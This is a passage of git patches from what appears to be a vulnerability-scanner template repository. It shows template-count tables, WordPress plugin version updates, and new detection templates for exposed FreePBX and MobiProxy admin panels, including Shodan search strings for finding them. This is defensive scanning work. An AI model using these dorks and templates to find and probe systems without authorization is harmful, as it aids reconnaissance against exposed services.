| | | | | | -| incapptic-connect | 1 | | | | | | | | | -| u5cms | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| couchcms | 1 | | | | | | | | | -| advanced-booking-calendar | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| streetview | 1 | | | | | | | | | -| yzmcms | 1 | | | | | | | | | -| icecast | 1 | | | | | | | | | -| pricing-deals-for-woocommerce | 1 | | | | | | | | | -| phpmemcached | 1 | | | | | | | | | +| zenserp | 1 | | | | | | | | | +| v2924 | 1 | | | | | | | | | +| teamwork | 1 | | | | | | | | | +| inetutils | 1 | | | | | | | | | | mongoshake | 1 | | | | | | | | | -| gorest | 1 | | | | | | | | | -| html2pdf | 1 | | | | | | | | | -| dradis | 1 | | | | | | | | | -| find | 1 | | | | | | | | | -| pcdn | 1 | | | | | | | | | -| ncomputing | 1 | | | | | | | | | -| tugboat | 1 | | | | | | | | | -| dropbox | 1 | | | | | | | | | -| bagisto | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| ixbusweb | 1 | | | | | | | | | -| tufin | 1 | | | | | | | | | -| interactsh | 1 | | | | | | | | | -| browshot | 1 | | | | | | | | | -| zblog | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| getgrav | 1 | | | | | | | | | -| cnvd2017 | 1 | | | | | | | | | -| 3com | 1 | | | | | | | | | -| drill | 1 | | | | | | | | | -| mailer | 1 | | | | | | | | | -| flyteconsole | 1 | | | | | | | | | -| permissions | 1 | | | | | | | | | -| wireless | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| bibliopac | 1 | | | | | | | | | -| faust | 1 | | | | | | | | | -| manager | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| siebel | 1 | | | | | | | | | -| buildkite | 1 | | | | | | | | | +| jobsearch | 1 | | | | | | | | | +| tianqing | 1 | | | | | | | | | +| contentful | 1 | | | | | | | | | +| openedx | 1 | | | | | | | | | +| nport | 1 | | | | | | | | | +| clearfy-cache | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| clustering | 1 | | | | | | | | | +| front | 1 | | | | | | | | | +| mirasys | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| adfs | 1 | | | | | | | | | +| reprise | 1 | | | | | | | | | +| ojs | 1 | | | | | | | | | +| netbeans | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| shadoweb | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| collegemanagement | 1 | | | | | | | | | +| malshare | 1 | | | | | | | | | | mdb | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| revslider | 1 | | | | | | | | | -| bingmaps | 1 | | | | | | | | | -| bamboo | 1 | | | | | | | | | -| jumpserver | 1 | | | | | | | | | -| darktrace | 1 | | | | | | | | | -| mailhog | 1 | | | | | | | | | -| webcenter | 1 | | | | | | | | | -| collectd | 1 | | | | | | | | | -| gerapy | 1 | | | | | | | | | -| sauter | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| gallery | 1 | | | | | | | | | -| mgrng | 1 | | | | | | | | | -| flexbe | 1 | | | | | | | | | -| b2bbuilder | 1 | | | | | | | | | -| activecollab | 1 | | | | | | | | | -| clockwork | 1 | | | | | | | | | -| ccm | 1 | | | | | | | | | -| officekeeper | 1 | | | | | | | | | -| fuji | 1 | | | | | | | | | -| flip | 1 | | | | | | | | | -| age-gate | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| filr | 1 | | | | | | | | | -| iq-block-country | 1 | | | | | | | | | -| sitefinity | 1 | | | | | | | | | -| notebook | 1 | | | | | | | | | -| mrtg | 1 | | | | | | | | | -| blockfrost | 1 | | | | | | | | | -| vault | 1 | | | | | | | | | -| short.io | 1 | | | | | | | | | -| phpsocialnetwork | 1 | | | | | | | | | -| superwebmailer | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | +| lob | 1 | | | | | | | | | +| director | 1 | | | | | | | | | +| cargocollective | 1 | | | | | | | | | +| suitecrm | 1 | | | | | | | | | +| version | 1 | | | | | | | | | +| shortpixel | 1 | | | | | | | | | +| udraw | 1 | | | | | | | | | +| oauth2 | 1 | | | | | | | | | +| rackup | 1 | | | | | | | | | +| pagecdn | 1 | | | | | | | | | +| nsicg | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| global | 1 | | | | | | | | | +| pypicloud | 1 | | | | | | | | | +| webnms | 1 | | | | | | | | | | secnet | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| vertex | 1 | | | | | | | | | -| phpldap | 1 | | | | | | | | | -| openweather | 1 | | | | | | | | | -| block | 1 | | | | | | | | | -| thedogapi | 1 | | | | | | | | | -| idera | 1 | | | | | | | | | -| remkon | 1 | | | | | | | | | -| cvms | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| nirweb-support | 1 | | | | | | | | | -| knowage | 1 | | | | | | | | | -| librenms | 1 | | | | | | | | | -| netmask | 1 | | | | | | | | | +| namedprocess | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| adafruit | 1 | | | | | | | | | +| novus | 1 | | | | | | | | | +| aquasec | 1 | | | | | | | | | +| shirnecms | 1 | | | | | | | | | +| asa | 1 | | | | | | | | | +| openvz | 1 | | | | | | | | | +| meteor | 1 | | | | | | | | | +| webroot | 1 | | | | | | | | | +| vercel | 1 | | | | | | | | | +| bagisto | 1 | | | | | | | | | +| alumni | 1 | | | | | | | | | +| strikingly | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| phpok | 1 | | | | | | | | | +| ymhome | 1 | | | | | | | | | +| quip | 1 | | | | | | | | | +| iserver | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| acs | 1 | | | | | | | | | +| mojoauth | 1 | | | | | | | | | +| contentkeeper | 1 | | | | | | | | | +| openid | 1 | | | | | | | | | +| xfinity | 1 | | | | | | | | | +| openssl | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| abbott | 1 | | | | | | | | | +| istat | 1 | | | | | | | | | +| luci | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| leadpages | 1 | | | | | | | | | +| fudforum | 1 | | | | | | | | | +| telecom | 1 | | | | | | | | | +| reddit | 1 | | | | | | | | | +| aryanic | 1 | | | | | | | | | +| planon | 1 | | | | | | | | | +| browserless | 1 | | | | | | | | | +| bravenewcoin | 1 | | | | | | | | | +| patreon-connect | 1 | | | | | | | | | +| seopanel | 1 | | | | | | | | | +| sslmate | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| rpcms | 1 | | | | | | | | | +| zeppelin | 1 | | | | | | | | | +| genie | 1 | | | | | | | | | +| badgeos | 1 | | | | | | | | | +| tls | 1 | | | | | | | | | +| secui | 1 | | | | | | | | | +| terraboard | 1 | | | | | | | | | +| privatekey | 1 | | | | | | | | | +| ecosys | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| ind780 | 1 | | | | | | | | | +| apim | 1 | | | | | | | | | +| libvirt | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| sqwebmail | 1 | | | | | | | | | +| asanhamayesh | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| ipdiva | 1 | | | | | | | | | +| memory-pipes | 1 | | | | | | | | | +| adWidget | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| amt | 1 | | | | | | | | | +| helprace | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| nownodes | 1 | | | | | | | | | +| orbintelligence | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| dwr | 1 | | | | | | | | | | ricoh | 1 | | | | | | | | | -| zipkin | 1 | | | | | | | | | -| joomsport-sports-league-results-management | 1 | | | | | | | | | -| cuppa | 1 | | | | | | | | | -| blueiris | 1 | | | | | | | | | -| edgeos | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| surveysparrow | 1 | | | | | | | | | -| stats | 1 | | | | | | | | | -| workreap | 1 | | | | | | | | | -| issabel | 1 | | | | | | | | | +| fortressaircraft | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| uberflip | 1 | | | | | | | | | +| vault | 1 | | | | | | | | | +| synapse | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| fortiproxy | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| wp-ban | 1 | | | | | | | | | +| 3com | 1 | | | | | | | | | +| currencyscoop | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index e8ddd218fe..31178b77d9 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1575 | dhiyaneshdk | 707 | cves | 1552 | info | 1919 | http | 4630 | -| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1169 | network | 84 | +| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 | +| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 | | wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 | | edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 | -| wp-plugin | 579 | geeknik | 220 | misconfiguration | 371 | low | 294 | | | +| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | | | exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | | | tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | | -| xss | 548 | 0x_akoko | 171 | workflows | 190 | | | | | -| lfi | 522 | dwisiswant0 | 171 | default-logins | 122 | | | | | +| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | | +| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | | | cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | | From a83d28beb0d93898d47c347e40f17245db73180c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 19:25:13 +0000 Subject: [PATCH 0763/1133] Auto README Update [Thu Jan 5 19:25:13 UTC 2023] :robot: --- README.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 434a46143f..f0f632e771 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1575 | dhiyaneshdk | 707 | cves | 1552 | info | 1919 | http | 4630 | -| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1169 | network | 84 | +| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 | +| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 | | wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 | | edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 | -| wp-plugin | 579 | geeknik | 220 | misconfiguration | 371 | low | 294 | | | +| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | | | exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | | | tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | | -| xss | 548 | 0x_akoko | 171 | workflows | 190 | | | | | -| lfi | 522 | dwisiswant0 | 171 | default-logins | 122 | | | | | +| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | | +| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | | | cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | | -**335 directories, 5243 files**. +**336 directories, 5244 files**. From 374dabaa96ae4306fddcc83a3badbc16f3c6574c Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 5 Jan 2023 14:52:43 -0500 Subject: [PATCH 0764/1133] Create freepbx-administration-panel.yaml --- .../freepbx-administration-panel.yaml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 exposed-panels/freepbx-administration-panel.yaml diff --git a/exposed-panels/freepbx-administration-panel.yaml b/exposed-panels/freepbx-administration-panel.yaml new file mode 100644 index 0000000000..ca1c539074 --- /dev/null +++ b/exposed-panels/freepbx-administration-panel.yaml @@ -0,0 +1,35 @@ +id: freepbx-administration-panel + +info: + name: FreePBX Administration Panel + author: info + severity: info + metadata: + verified: true + shodan-dork: http.title:"FreePBX Administration" + tags: detect,panel + +requests: + - method: GET + path: + - '{{BaseURL}}/admin/config.php#' + + matchers-condition: and + matchers: + + - type: word + words: + - 'FreePBX Administration' + - 'Operator Panel' + - 'User Control Panel' + part: body + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 470e30d1ca1962d84834b2a52e76501ec5b7529e Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Thu, 5 Jan 2023 15:14:28 -0500 Subject: [PATCH 0765/1133] Create mobiproxy-dashboard.yaml --- exposures/configs/mobiproxy-dashboard.yaml | 36 ++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 exposures/configs/mobiproxy-dashboard.yaml diff --git a/exposures/configs/mobiproxy-dashboard.yaml b/exposures/configs/mobiproxy-dashboard.yaml new file mode 100644 index 0000000000..6ab0598d7a --- /dev/null +++ b/exposures/configs/mobiproxy-dashboard.yaml @@ -0,0 +1,36 @@ +id: mobiproxy-dashboard + +info: + name: MobiProxy Dashboard + author: tess + severity: high + metadata: + verified: true + shodan-dork: http.title:"MobiProxy" + tags: detect,dashboard,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + + - type: word + words: + - 'MobiProxy' + - 'Dashboard' + - 'Setting' + - 'API' + part: body + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 3c7e0a14f494b7ef1eab591d0b8a7911fc835e6c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 6 Jan 2023 04:02:29 +0000 Subject: [PATCH 0766/1133] Auto WordPress Plugins Update [Fri Jan 6 04:02:29 UTC 2023] :robot: --- helpers/wordpress/plugins/photo-gallery.txt | 2 +- helpers/wordpress/plugins/post-smtp.txt | 2 +- helpers/wordpress/plugins/wpforms-lite.txt | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/helpers/wordpress/plugins/photo-gallery.txt b/helpers/wordpress/plugins/photo-gallery.txt index 8b315b3fed..5af131d650 100644 --- a/helpers/wordpress/plugins/photo-gallery.txt +++ b/helpers/wordpress/plugins/photo-gallery.txt @@ -1 +1 @@ -1.8.8 \ No newline at end of file +1.8.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index c0943d3e98..a6254504e4 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.3 \ No newline at end of file +2.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt index 25a6ced8b2..cb1ad9b47f 100644 --- a/helpers/wordpress/plugins/wpforms-lite.txt +++ b/helpers/wordpress/plugins/wpforms-lite.txt @@ -1 +1 @@ -1.7.8 \ No newline at end of file +1.7.9 \ No newline at end of file From 6d46556ff933fbbdbdf07825f3c795cfd186bedf Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 6 Jan 2023 04:04:28 +0000 Subject: [PATCH 0767/1133] Auto WordPress Plugins Update [Fri Jan 6 04:04:28 UTC 2023] :robot: --- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt | 2 +- helpers/wordpress/plugins/cookie-law-info.txt | 2 +- helpers/wordpress/plugins/facebook-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/photo-gallery.txt | 2 +- helpers/wordpress/plugins/post-smtp.txt | 2 +- helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/shortpixel-image-optimiser.txt | 2 +- helpers/wordpress/plugins/siteorigin-panels.txt | 2 +- helpers/wordpress/plugins/so-widgets-bundle.txt | 2 +- helpers/wordpress/plugins/tablepress.txt | 2 +- helpers/wordpress/plugins/webp-converter-for-media.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- helpers/wordpress/plugins/woocommerce-services.txt | 2 +- helpers/wordpress/plugins/wp-statistics.txt | 2 +- helpers/wordpress/plugins/wp-user-avatar.txt | 2 +- helpers/wordpress/plugins/wpforms-lite.txt | 2 +- helpers/wordpress/plugins/yith-woocommerce-compare.txt | 2 +- technologies/wordpress/plugins/elementskit-lite.yaml | 2 +- technologies/wordpress/plugins/shortpixel-image-optimiser.yaml | 2 +- 22 files changed, 22 insertions(+), 22 deletions(-) diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index e72ec4fec6..c745147036 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -3.1.21 \ No newline at end of file +3.1.22 \ No newline at end of file diff --git a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt index 10724e0b42..318956c3d5 100644 --- a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt +++ b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt @@ -1 +1 @@ -3.18.1 \ No newline at end of file +3.19 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt index 3a8b97174c..e46454be8c 100644 --- a/helpers/wordpress/plugins/cookie-law-info.txt +++ b/helpers/wordpress/plugins/cookie-law-info.txt @@ -1 +1 @@ -3.0.7 \ No newline at end of file +3.0.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index 8ffc1ad640..3a8b97174c 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.0.6 \ No newline at end of file +3.0.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 86417cf417..de4914e939 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -14.8.3 \ No newline at end of file +14.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 8191138914..ecedc98d1d 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.3.0 \ No newline at end of file +4.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/photo-gallery.txt b/helpers/wordpress/plugins/photo-gallery.txt index 8b315b3fed..5af131d650 100644 --- a/helpers/wordpress/plugins/photo-gallery.txt +++ b/helpers/wordpress/plugins/photo-gallery.txt @@ -1 +1 @@ -1.8.8 \ No newline at end of file +1.8.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index 6b4d157738..a6254504e4 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.2.3 \ No newline at end of file +2.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index d704a500a9..403b34f56d 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.9.45 \ No newline at end of file +4.9.46 \ No newline at end of file diff --git a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt index ed95ef7767..7a3e417feb 100644 --- a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt +++ b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt @@ -1 +1 @@ -5.1.5 \ No newline at end of file +5.1.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/siteorigin-panels.txt b/helpers/wordpress/plugins/siteorigin-panels.txt index 0352eb1709..29e5a3bd47 100644 --- a/helpers/wordpress/plugins/siteorigin-panels.txt +++ b/helpers/wordpress/plugins/siteorigin-panels.txt @@ -1 +1 @@ -2.20.1 \ No newline at end of file +2.20.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt index 241e887d6f..9592b2f94b 100644 --- a/helpers/wordpress/plugins/so-widgets-bundle.txt +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -1 +1 @@ -1.46.0 \ No newline at end of file +1.46.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index 10bf840ed5..f93ea0ca33 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.0.1 \ No newline at end of file +2.0.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 566ac6388b..475e184294 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.6.1 \ No newline at end of file +5.6.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 7cbea073be..804440660c 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -5.2.0 \ No newline at end of file +5.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt index 50aea0e7ab..7c32728738 100644 --- a/helpers/wordpress/plugins/woocommerce-services.txt +++ b/helpers/wordpress/plugins/woocommerce-services.txt @@ -1 +1 @@ -2.1.0 \ No newline at end of file +2.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 7b8ae8d79c..c985b8dd6e 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -13.2.10 \ No newline at end of file +13.2.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index 99523d4768..689f7fbd33 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.5.1 \ No newline at end of file +4.5.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt index 25a6ced8b2..cb1ad9b47f 100644 --- a/helpers/wordpress/plugins/wpforms-lite.txt +++ b/helpers/wordpress/plugins/wpforms-lite.txt @@ -1 +1 @@ -1.7.8 \ No newline at end of file +1.7.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/yith-woocommerce-compare.txt b/helpers/wordpress/plugins/yith-woocommerce-compare.txt index 971e119ac7..f1270b4e4e 100644 --- a/helpers/wordpress/plugins/yith-woocommerce-compare.txt +++ b/helpers/wordpress/plugins/yith-woocommerce-compare.txt @@ -1 +1 @@ -2.21.0 \ No newline at end of file +2.22.0 \ No newline at end of file diff --git a/technologies/wordpress/plugins/elementskit-lite.yaml b/technologies/wordpress/plugins/elementskit-lite.yaml index aa6a26bbb9..089ed23cb3 100644 --- a/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/technologies/wordpress/plugins/elementskit-lite.yaml @@ -1,7 +1,7 @@ id: wordpress-elementskit-lite info: - name: ElementsKit Elementor addons (Header Footer Builder, Mega Menu Builder, Free Elementor Widgets & Templates Library) Detection + name: ElementsKit Elementor addons Detection author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 9a97dcbb3e..b6d5385b44 100644 --- a/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -1,7 +1,7 @@ id: wordpress-shortpixel-image-optimiser info: - name: ShortPixel Image Optimizer Detection + name: ShortPixel Image Optimizer – Optimize Images, Convert WebP & AVIF Detection author: ricardomaia severity: info reference: From d152b37643f9d6173ef18fd7ebf34c1397d84fe5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 6 Jan 2023 05:31:12 +0000 Subject: [PATCH 0768/1133] Auto Generated New Template Addition List [Fri Jan 6 05:31:12 UTC 2023] :robot: --- .new-additions | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/.new-additions b/.new-additions index 8ed3e8c61e..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,15 +0,0 @@ -cves/2021/CVE-2021-24946.yaml -cves/2022/CVE-2022-0784.yaml -cves/2022/CVE-2022-24816.yaml -cves/2022/CVE-2022-46169.yaml -exposed-panels/lenovo-fp-panel.yaml -exposed-panels/mpftvc-admin-panel.yaml -exposed-panels/netsparker-panel.yaml -exposed-panels/watershed-panel.yaml -exposed-panels/zoho/manageengine-network-config.yaml -misconfiguration/akamai/akamai-s3-cache-poisoning.yaml -misconfiguration/installer/acunetix-360-installer.yaml -misconfiguration/installer/netsparker-enterprise-installer.yaml -network/detection/pgsql-detect.yaml -technologies/akamai-detect.yaml -token-spray/api-zerbounce.yaml From 3f0d39fedc46710aceb09e802c1f1e9051a3074c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 6 Jan 2023 11:07:16 +0530 Subject: [PATCH 0769/1133] Update and rename exposures/configs/mobiproxy-dashboard.yaml to exposures/mobiproxy-dashboard.yaml --- exposures/{configs => }/mobiproxy-dashboard.yaml | 15 ++++----------- 1 file changed, 4 insertions(+), 11 deletions(-) rename exposures/{configs => }/mobiproxy-dashboard.yaml (70%) diff --git a/exposures/configs/mobiproxy-dashboard.yaml b/exposures/mobiproxy-dashboard.yaml similarity index 70% rename from exposures/configs/mobiproxy-dashboard.yaml rename to exposures/mobiproxy-dashboard.yaml index 6ab0598d7a..5c98dc4252 100644 --- a/exposures/configs/mobiproxy-dashboard.yaml +++ b/exposures/mobiproxy-dashboard.yaml @@ -1,13 +1,13 @@ id: mobiproxy-dashboard info: - name: MobiProxy Dashboard + name: MobiProxy Dashboard Exposure author: tess - severity: high + severity: medium metadata: verified: true shodan-dork: http.title:"MobiProxy" - tags: detect,dashboard,exposure + tags: dashboard,exposure,mobiproxy requests: - method: GET @@ -16,21 +16,14 @@ requests: matchers-condition: and matchers: - - type: word + part: body words: - '<title>MobiProxy' - 'Dashboard' - 'Setting' - - 'API' - part: body condition: and - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 672bcae034fc5d925b901d12eca7bd8a41a529ca Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 6 Jan 2023 05:39:27 +0000 Subject: [PATCH 0770/1133] Auto Generated New Template Addition List [Fri Jan 6 05:39:27 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..d329155e7e 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1 @@ +exposures/mobiproxy-dashboard.yaml From 23a1294da2abea0560e5b53a38732189ecd5445d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 6 Jan 2023 11:13:31 +0530 Subject: [PATCH 0771/1133] fix-template --- exposed-panels/freepbx-administration-panel.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/exposed-panels/freepbx-administration-panel.yaml b/exposed-panels/freepbx-administration-panel.yaml index ca1c539074..72a1e635e4 100644 --- a/exposed-panels/freepbx-administration-panel.yaml +++ b/exposed-panels/freepbx-administration-panel.yaml @@ -2,12 +2,12 @@ id: freepbx-administration-panel info: name: FreePBX Administration Panel - author: info + author: tess severity: info metadata: - verified: true + verified: "true" shodan-dork: http.title:"FreePBX Administration" - tags: detect,panel + tags: freepbx,panel requests: - method: GET @@ -16,13 +16,12 @@ requests: matchers-condition: and matchers: - - type: word + part: body words: - 'FreePBX Administration' - 'Operator Panel' - 'User Control Panel' - part: body condition: and - type: word From 857dc99b2c1f4c50136c5f71e7197d963b7c77b6 Mon Sep 17 00:00:00 2001 From: GitHub Action 